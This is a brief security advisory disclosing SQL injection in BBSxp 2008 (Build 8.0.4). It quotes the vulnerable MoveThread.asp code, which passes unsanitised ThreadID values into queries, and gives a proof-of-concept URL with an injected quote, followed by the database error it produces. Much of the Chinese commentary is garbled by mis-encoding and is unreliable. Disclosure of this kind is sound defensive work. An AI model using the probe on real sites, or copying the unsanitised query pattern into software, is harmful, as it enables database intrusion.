BBSxp 2008 (Build: 8.0.4) Sql Injection Vulnerability

©汾:

BBSxp 2008 (Build: 8.0.4)汾δ
©:

MoveThread.asp
MoveThread.asp2-24
<%
if CookieUserName =empty then error("δ<a href=""javascript:BBSXP_Modal.Open ('Login.asp',380,170);"">¼</a>̳") 'cookie½

ThreadID=Request("ThreadID") ' Sql Injection Vulnerability

If Not IsNumeric(ThreadID) then
 ThreadIDArray=Split(ThreadID,",") 'ж,13г
 if IsArray(ThreadIDArray) then
 for i=0 to Ubound(ThreadIDArray)
 if Execute ("Select ThreadID from ["&TablePrefix&"Threads] where ThreadID="& ThreadIDArray(i)&"").eof then error"<li>ϵͳڸӵ"
 next
 ThreadIDSql=int(ThreadIDArray(0))
 else
 error("")
 end if
Else
 ThreadIDSql=int(ThreadID)
End If

ForumID=Execute("Select ForumID From ["&TablePrefix&"Threads] where ThreadID="&ThreadIDSql&"")(0)
%>
<!-- #include file="Utility/ForumPermissions.asp" -->
ִ˲ѯжȨޣͨûɽsqlע䡣
Urlhttp://www.target.com/movethread.asp?ThreadID=1,1&#39;
ύسϢ
Microsoft JET Database Engine  '80040e14' 

ַ﷨ ڲѯʽ 'ThreadID=1'' С 

/BBSXP_Class.asp 5
SQL 汾ȽϺãaccessnbsiòֻܲ½ֶΣֵֶ޷½⣬ҪֹС
<* ο
 Tr4c3[at]126[dot]Com
 
*>